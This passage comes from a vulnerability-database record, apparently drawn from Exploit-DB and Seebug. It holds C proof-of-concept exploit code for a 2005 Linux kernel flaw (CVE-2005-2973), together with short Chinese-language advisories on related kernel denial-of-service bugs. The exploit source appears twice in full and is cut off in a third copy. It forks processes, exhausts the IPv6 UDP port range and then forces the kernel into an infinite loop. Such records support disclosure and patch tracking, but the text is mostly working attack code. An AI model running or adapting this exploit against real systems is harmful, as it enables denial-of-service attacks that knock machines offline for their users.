*\r\n * The author's liability shall not be incurred as a result of loss of due *\r\n * the total or partial failure to fulfill anyone's obligations and direct *\r\n * or consequential loss due to the software's use or performance. *\r\n * *\r\n * The current situation as regards scientific and technical know-how at the *\r\n * time when this software was distributed did not enable all possible uses *\r\n * to be tested and verified, nor for the presence of any or all faults to *\r\n * be detected. In this respect, people's attention is drawn to the risks *\r\n * associated with loading, using, modifying and/or developing and *\r\n * reproducing this software. *\r\n * The user shall be responsible for verifying, by any or all means, the *\r\n * software's suitability for its requirements, its due and proper *\r\n * functioning, and for ensuring that it shall not cause damage to either *\r\n * persons or property. *\r\n * *\r\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *\r\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *\r\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *\r\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *\r\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *\r\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *\r\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *\r\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *\r\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *\r\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *\r\n * *\r\n * The author does not either expressly or tacitly warrant that this *\r\n * software does not infringe any or all third party intellectual right *\r\n * relating to a patent, software or to any or all other property right. *\r\n * Moreover, the author shall not hold someone harmless against any or all *\r\n * proceedings for infringement that may be instituted in respect of the *\r\n * use, modification and redistrbution of this software. *\r\n *****************************************************************************/\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/resource.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\nstatic int\r\nbind_udpv6_port (uint16_t port)\r\n{\r\n\tint fd;\r\n\r\n\tfd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\r\n\tif (fd != -1)\r\n\t{\r\n\t\tstruct sockaddr_in6 addr;\r\n\t\tint val = 1;\r\n\r\n\t\tsetsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));\r\n\r\n\t\tmemset (&addr, 0, sizeof (addr));\r\n\t\taddr.sin6_family = AF_INET6;\r\n\t\taddr.sin6_port = htons (port);\r\n\t\tif (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)\r\n\t\t\treturn fd;\r\n\r\n\t\tclose (fd);\r\n\t}\r\n\treturn -1;\r\n}\r\n\r\n\r\nstatic int\r\nget_fd_limit (void)\r\n{\r\n\tstruct rlimit lim;\r\n\r\n\tgetrlimit (RLIMIT_NOFILE, &lim);\r\n\tlim.rlim_cur = lim.rlim_max;\r\n\tsetrlimit (RLIMIT_NOFILE, &lim);\r\n\treturn (int)lim.rlim_max;\r\n}\r\n\r\n\r\nstatic void\r\nget_port_range (uint16_t *range)\r\n{\r\n\tFILE *stream;\r\n\r\n\t/* conservative defaults */\r\n\trange[0] = 1024;\r\n\trange[1] = 65535;\r\n\r\n\tstream = fopen (\"/proc/sys/net/ipv4/ip_local_port_range\", \"r\");\r\n\tif (stream != NULL)\r\n\t{\r\n\t\tunsigned i[2];\r\n\r\n\t\tif ((fscanf (stream, \"%u %u\", i, i + 1) == 2)\r\n\t\t && (i[0] <= i[1]) && (i[1] < 65535))\r\n\t\t{\r\n\t\t\trange[0] = (uint16_t)i[0];\r\n\t\t\trange[1] = (uint16_t)i[1];\r\n\t\t}\r\n\t\tfclose (stream);\r\n\t}\r\n}\r\n\r\n\r\n/* The criticial is fairly simple to raise : the infinite loop occurs when\r\n * calling bind with no speficied port number (ie zero), if and only if the\r\n * IPv6 stack cannot find any free UDP port within the local port range\r\n * (normally 32768-61000). Because this requires times more sockets than what\r\n * a process normally can open at a given time, we have to spawn several\r\n * processes. Then, the simplest way to trigger the crash condition consists\r\n * of opening up kernel-allocated UDP ports until it crashes, but that is\r\n * fairly slow (because allocation are stored in small a hash table of lists,\r\n * that are checked at each allocation). A much faster scheme involves getting\r\n * the local port range from /proc, allocating one by one, and only then, ask\r\n * for automatic (any/zero) port allocation.\r\n */\r\nstatic int\r\nproof (void)\r\n{\r\n\tint lim, val = 2;\r\n\tpid_t pid, ppid;\r\n\tuint16_t range[2], port;\r\n\r\n\tlim = get_fd_limit ();\r\n\tif (lim <= 3)\r\n\t\treturn -2;\r\n\r\n\tget_port_range (range);\r\n\r\n\tport = range[0];\r\n\tppid = getpid ();\r\n\r\n\tputs (\"Stage 1...\");\r\n\tdo\r\n\t{\r\n\t\tswitch (pid = fork ())\r\n\t\t{\r\n\t\t\tcase 0:\r\n\t\t\t\tfor (val = 3; val < lim; val++)\r\n\t\t\t\t\tclose (val);\r\n\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tif (bind_udpv6_port (port) >= 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (port)\r\n\t\t\t\t\t\t\tport++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (port && (errno == EADDRINUSE))\r\n\t\t\t\t\t\tport++; /* skip already used port */\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (errno != EMFILE)\r\n\t\t\t\t\t\t/* EAFNOSUPPORT -> no IPv6 stack */\r\n\t\t\t\t\t\t/* EADDRINUSE -> not vulnerable */\r\n\t\t\t\t\t\texit (1);\r\n\r\n\t\t\t\t\tif (port > range[1])\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tputs (\"Stage 2... should crash quickly\");\r\n\t\t\t\t\t\tport = 0;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\twhile (errno != EMFILE);\r\n\r\n\t\t\t\tbreak; /* EMFILE: spawn new process */\r\n\r\n\t\t\tcase -1:\r\n\t\t\t\texit (2);\r\n\r\n\t\t\tdefault:\r\n\t\t\t\twait (&val);\r\n\t\t\t\tif (ppid != getpid ())\r\n\t\t\t\t\texit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);\r\n\t\t}\r\n\t}\r\n\twhile (pid == 0);\r\n\r\n\tputs (\"System not vulnerable\");\r\n\treturn -val;\r\n}\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tsetvbuf (stdout, NULL, _IONBF, 0);\r\n\tputs (\"Linux kernel IPv6 UDP port infinite loop vulnerability\\n\"\r\n\t \"proof of concept code\\n\"\r\n\t \"Copyright (C) 2005 Remi Denis-Courmont \"\r\n\t \"<\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x40\\x73\\x69\\x6d\\x70\"\r\n\t \"\\x68\\x61\\x6c\\x65\\x6d\\x70\\x69\\x6e\\x2e\\x63\\x6f\\x6d>\\n\");\r\n\r\n\treturn -proof ();\r\n}\r\n\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26382/"}], "seebug": [{"lastseen": "2017-11-19T22:39:37", "description": "BUGTRAQ ID: 15365\r\nCVE(CAN) ID: CVE-2005-2709\r\n\r\nLinux kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684"sysctl.c"\u5728"/proc/sys/net/ipv4/conf/"\u4e2d\u5904\u7406\u63a5\u53e3\u6ce8\u9500\u65f6\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u3002\u6076\u610f\u7528\u6237\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5bfc\u81f4\u7cfb\u7edf\u5fd9\u788c\uff0c\u9020\u6210\u670d\u52a1\u4e0d\u53ef\u7528\u3002\n\nLinux kernel < 2.6.14.1\n Linux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n* Linux Upgrade linux-2.6.14.1.tar.bz2\r\n<a href=http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.14.1.tar.bz2 target=_blank>http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.14.1.tar.bz2</a>\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2006:0101-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2006:0101-01\uff1aImportant: kernel security update\r\n\u94fe\u63a5\uff1a<a href=http://lwn.net/Alerts/168077/?format=printable target=_blank>http://lwn.net/Alerts/168077/?format=printable</a>", "published": "2006-08-17T00:00:00", "title": "Linux Kernel Sysctl\u63a5\u53e3\u6ce8\u9500\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2709"], "modified": "2006-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4213", "id": "SSV:4213", "sourceData": "", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T22:28:13", "description": "BUGTRAQ ID: 16043\r\nCVE(CAN) ID: CVE-2005-3858\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684ip6_input_finish()\u51fd\u6570\u4e2d\u5b58\u5728\u5185\u5b58\u6cc4\u9732\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5bf9\u670d\u52a1\u5668\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u53d1\u9001\u7279\u5236\u7684IPv6\u62a5\u6587\u5bfc\u81f4\u8017\u5c3d\u6240\u6709\u53ef\u7528\u7684Kernel\u5185\u5b58\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\n\n\nLinux kernel <= 2.6.12.5\n Linux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n* Linux Upgrade linux-2.6.12.6.tar.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.12.6.tar.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.12.6.tar.bz2</a>\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2006:0101-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2006:0101-01\uff1aImportant: kernel security update\r\n\u94fe\u63a5\uff1a<a href=http://lwn.net/Alerts/168077/?format=printable target=_blank>http://lwn.net/Alerts/168077/?format=printable</a>", "published": "2006-08-17T00:00:00", "title": "Linux Kernel IP6_Input_Finish\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3858"], "modified": "2006-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4214", "id": "SSV:4214", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T22:28:22", "description": "BUGTRAQ ID: 16044\r\nCVE(CAN) ID: CVE-2005-3848\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u5728\u5904\u7406ICMP\u901a\u8baf\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5bfc\u81f4\u4e3b\u673a\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\n\u5982\u679cicmp_push_reply()\u4e2d\u7684ip_append_data()\u8c03\u7528\u5931\u8d25\u7684\u8bdd\uff0c\u5c31\u5fc5\u987b\u8c03\u7528ip_flush_pending_frames()\u3002\u5426\u5219\uff0cinet_sk(icmp_socket->sk)->cork.rt\u5c31\u4e0d\u4f1a\u8c03\u7528ip_rt_put()\uff0c\u5bfc\u81f4\u65e0\u6cd5\u91ca\u653e\u8def\u7531\u548cnet_device\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u53d1\u9001\u5927\u91cf\u7279\u5236\u62a5\u6587\u5bfc\u81f4\u8017\u5c3d\u6240\u6709\u5185\u5b58\u3002\r\n\n\nLinux kernel <= 2.6.12.5\r\nLinux kernel 2.6.13\n Linux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n* Linux Upgrade linux-2.6.12.6.tar.bz2\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.12.6.tar.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.12.6.tar.bz2</a>\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2006:0101-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2006:0101-01\uff1aImportant: kernel security update\r\n\u94fe\u63a5\uff1a<a href=http://lwn.net/Alerts/168077/?format=printable target=_blank>http://lwn.net/Alerts/168077/?format=printable</a>", "published": "2006-08-17T00:00:00", "title": "Linux Kernel ICMP_Push_Reply\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3848"], "modified": "2006-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4215", "id": "SSV:4215", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T15:46:48", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel 2.6.x - IPV6 Local Denial of Service Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2973"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-80020", "id": "SSV:80020", "sourceData": "\n source: http://www.securityfocus.com/bid/15156/info\r\n\r\nLinux Kernel is reported prone to a local denial-of-service vulnerability.\r\n\r\nThis issue arises from an infinite loop when binding IPv6 UDP ports. \r\n\r\n/*\r\n * Linux kernel\r\n * IPv6 UDP port selection infinite loop\r\n * local denial of service vulnerability\r\n * proof of concept code\r\n * version 1.0 (Oct 29 2005)\r\n * CVE ID: CAN-2005-2973\r\n *\r\n * by Remi Denis-Courmont < exploit at simphalempin dot com >\r\n * http://www.simphalempin.com/dev/\r\n *\r\n * Vulnerable:\r\n * - Linux < 2.6.14 with IPv6\r\n *\r\n * Not vulnerable:\r\n * - Linux >= 2.6.14\r\n * - Linux without IPv6\r\n *\r\n * Fix:\r\n * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;\r\n * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2\r\n */\r\n\r\n\r\n/*****************************************************************************\r\n * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *\r\n * *\r\n * Redistribution and use in source and binary forms, with or without *\r\n * modification, are permitted provided that the following conditions *\r\n * are met: *\r\n * 1. Redistributions of source code must retain the above copyright notice, *\r\n * this list of conditions and the following disclaimer. *\r\n * 2. Redistribution in binary form must reproduce the above copyright *\r\n * notice, this list of conditions and the following disclaimer in the *\r\n * documentation and/or other materials provided with the distribution. *\r\n * *\r\n * The author's liability shall not be incurred as a result of loss of due *\r\n * the total or partial failure to fulfill anyone's obligations and direct *\r\n * or consequential loss due to the software's use or performance. *\r\n * *\r\n * The current situation as regards scientific and technical know-how at the *\r\n * time when this software was distributed did not enable all possible uses *\r\n * to be tested and verified, nor for the presence of any or all faults to *\r\n * be detected. In this respect, people's attention is drawn to the risks *\r\n * associated with loading, using, modifying and/or developing and *\r\n * reproducing this software. *\r\n * The user shall be responsible for verifying, by any or all means, the *\r\n * software's suitability for its requirements, its due and proper *\r\n * functioning, and for ensuring that it shall not cause damage to either *\r\n * persons or property. *\r\n * *\r\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *\r\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *\r\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *\r\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *\r\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *\r\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *\r\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *\r\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *\r\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *\r\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *\r\n * *\r\n * The author does not either expressly or tacitly warrant that this *\r\n * software does not infringe any or all third party intellectual right *\r\n * relating to a patent, software or to any or all other property right. *\r\n * Moreover, the author shall not hold someone harmless against any or all *\r\n * proceedings for infringement that may be instituted in respect of the *\r\n * use, modification and redistrbution of this software. *\r\n *****************************************************************************/\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/resource.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\nstatic int\r\nbind_udpv6_port (uint16_t port)\r\n{\r\n\tint fd;\r\n\r\n\tfd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\r\n\tif (fd != -1)\r\n\t{\r\n\t\tstruct sockaddr_in6 addr;\r\n\t\tint val = 1;\r\n\r\n\t\tsetsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));\r\n\r\n\t\tmemset (&addr, 0, sizeof (addr));\r\n\t\taddr.sin6_family = AF_INET6;\r\n\t\taddr.sin6_port = htons (port);\r\n\t\tif (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)\r\n\t\t\treturn fd;\r\n\r\n\t\tclose (fd);\r\n\t}\r\n\treturn -1;\r\n}\r\n\r\n\r\nstatic int\r\nget_fd_limit (void)\r\n{\r\n\tstruct rlimit lim;\r\n\r\n\tgetrlimit (RLIMIT_NOFILE, &lim);\r\n\tlim.rlim_cur = lim.rlim_max;\r\n\tsetrlimit (RLIMIT_NOFILE, &lim);\r\n\treturn (int)lim.rlim_max;\r\n}\r\n\r\n\r\nstatic void\r\nget_port_range (uint16_t *range)\r\n{\r\n\tFILE *stream;\r\n\r\n\t/* conservative defaults */\r\n\trange[0] = 1024;\r\n\trange[1] = 65535;\r\n\r\n\tstream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r");\r\n\tif (stream != NULL)\r\n\t{\r\n\t\tunsigned i[2];\r\n\r\n\t\tif ((fscanf (stream, "%u %u", i, i + 1) == 2)\r\n\t\t && (i[0] <= i[1]) && (i[1] < 65535))\r\n\t\t{\r\n\t\t\trange[0] = (uint16_t)i[0];\r\n\t\t\trange[1] = (uint16_t)i[1];\r\n\t\t}\r\n\t\tfclose (stream);\r\n\t}\r\n}\r\n\r\n\r\n/* The criticial is fairly simple to raise : the infinite loop occurs when\r\n * calling bind with no speficied port number (ie zero), if and only if the\r\n * IPv6 stack cannot find any free UDP port within the local port range\r\n * (normally 32768-61000). Because this requires times more sockets than what\r\n * a process normally can open at a given time, we have to spawn several\r\n * processes. Then, the simplest way to trigger the crash condition consists\r\n * of opening up kernel-allocated UDP ports until it crashes, but that is\r\n * fairly slow (because allocation are stored in small a hash table of lists,\r\n * that are checked at each allocation). A much faster scheme involves getting\r\n * the local port range from /proc, allocating one by one, and only then, ask\r\n * for automatic (any/zero) port allocation.\r\n */\r\nstatic int\r\nproof (void)\r\n{\r\n\tint lim, val = 2;\r\n\tpid_t pid, ppid;\r\n\tuint16_t range[2], port;\r\n\r\n\tlim = get_fd_limit ();\r\n\tif (lim <= 3)\r\n\t\treturn -2;\r\n\r\n\tget_port_range (range);\r\n\r\n\tport = range[0];\r\n\tppid = getpid ();\r\n\r\n\tputs ("Stage 1...");\r\n\tdo\r\n\t{\r\n\t\tswitch (pid = fork ())\r\n\t\t{\r\n\t\t\tcase 0:\r\n\t\t\t\tfor (val = 3; val < lim; val++)\r\n\t\t\t\t\tclose (val);\r\n\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tif (bind_udpv6_port (port) >= 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (port)\r\n\t\t\t\t\t\t\tport++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (port && (errno == EADDRINUSE))\r\n\t\t\t\t\t\tport++; /* skip already used port */\r\n\t\t\t\t\telse\r\n\t\t\t\t\tif (errno != EMFILE)\r\n\t\t\t\t\t\t/* EAFNOSUPPORT -> no IPv6 stack */\r\n\t\t\t\t\t\t/* EADDRINUSE -> not vulnerable */\r\n\t\t\t\t\t\texit (1);\r\n\r\n\t\t\t\t\tif (port > range[1])\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tputs ("Stage 2... should crash quickly");\r\n\t\t\t\t\t\tport = 0;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\twhile (errno != EMFILE);\r\n\r\n\t\t\t\tbreak; /* EMFILE: spawn new process */\r\n\r\n\t\t\tcase -1:\r\n\t\t\t\texit (2);\r\n\r\n\t\t\tdefault:\r\n\t\t\t\twait (&val);\r\n\t\t\t\tif (ppid != getpid ())\r\n\t\t\t\t\texit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);\r\n\t\t}\r\n\t}\r\n\twhile (pid == 0);\r\n\r\n\tputs ("System not vulnerable");\r\n\treturn -val;\r\n}\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tsetvbuf (stdout, NULL, _IONBF, 0);\r\n\tputs ("Linux kernel IPv6 UDP port infinite loop vulnerability\\n"\r\n\t "proof of concept code\\n"\r\n\t "Copyright (C) 2005 Remi Denis-Courmont "\r\n\t "<\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x40\\x73\\x69\\x6d\\x70"\r\n\t "\\x68\\x61\\x6c\\x65\\x6d\\x70\\x69\\x6e\\x2e\\x63\\x6f\\x6d>\\n");\r\n\r\n\treturn -proof ();\r\n}\r\n\r\n\n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-80020"}, {"lastseen": "2017-11-19T17:20:03", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel 2.6.x Sysctl Unregistration Local Denial of Service Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2973"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-80123", "id": "SSV:80123", "sourceData": "\n source: http://www.securityfocus.com/bid/15365/info\r\n\r\nLinux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed.\r\n\r\nThis issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed. \r\n\r\n/*\r\n * Linux kernel\r\n * IPv6 UDP port selection infinite loop\r\n * local denial of service vulnerability\r\n * proof of concept code\r\n * version 1.0 (Oct 29 2005)\r\n * CVE ID: CAN-2005-2973\r\n *\r\n * by Remi Denis-Courmont < exploit at simphalempin dot com >\r\n * http://www.simphalempin.com/dev/\r\n *\r\n * Vulnerable:\r\n * - Linux < 2.6.14 with IPv6\r\n *\r\n * Not vulnerable:\r\n * - Linux >= 2.6.14\r\n * - Linux without IPv6\r\n *\r\n * Fix:\r\n * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;\r\n * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2\r\n */\r\n\r\n\r\n/*****************************************************************************\r\n * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *\r\n * *\r\n * Redistribution and use in source and binary forms, with or without *\r\n * modification, are permitted provided that the following conditions *\r\n * are met: *\r\n * 1. Redistributions of source code must retain the above copyright notice, *\r\n * this list of conditions and the following disclaimer. *\r\n * 2. Redistribution in binary form must reproduce the above copyright *\r\n * notice, this list of conditions and the following disclaimer in the *\r\n * documentation and/or other materials provided with the distribution. *\r\n * *\r\n * The author's liability shall not be incurred as a result of loss of due *\r\n * the total or partial failure to fulfill anyone's obligations and direct *\r\n * or consequential loss due to the software's use or performance. *\r\n * *\r\n * The current situation as regards scientific and technical know-how at the *\r\n * time when this software was distributed did not enable all possible uses *\r\n * to be tested and verified, nor for the presence of any or all faults to *\r\n * be detected. In this respect, people's attention is drawn to the risks *\r\n * associated with loading, using, modifying and/or developing and *\r\n * reproducing this software. *\r\n * The user shall be responsible for verifying, by any or all means, the *\r\n * software's suitability for its requirements, its due and proper *\r\n * functioning, and for ensuring that it shall not cause damage to either *\r\n * persons or property. *\r\n * *\r\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *\r\n * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *\r\n * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *\r\n * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *\r\n * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *\r\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *\r\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *\r\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *\r\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *\r\n * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *\r\n * *\r\n * The author does not either expressly or tacitly warrant that this *\r\n * software does not infringe any or all third party intellectual right *\r\n * relating to a patent, software or to any or all other property right. *\r\n * Moreover, the author shall not hold someone harmless against any or all *\r\n * proceedings for infringement that may be instituted in respect of the *\r\n * use, modification and redistrbution of this software. *\r\n *****************************************************************************/\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/resource.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\nstatic int\r\nbind_udpv6_port (uint16_t port)\r\n{\r\n\tint fd;\r\n\r\n\tfd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\r\n\tif (fd != 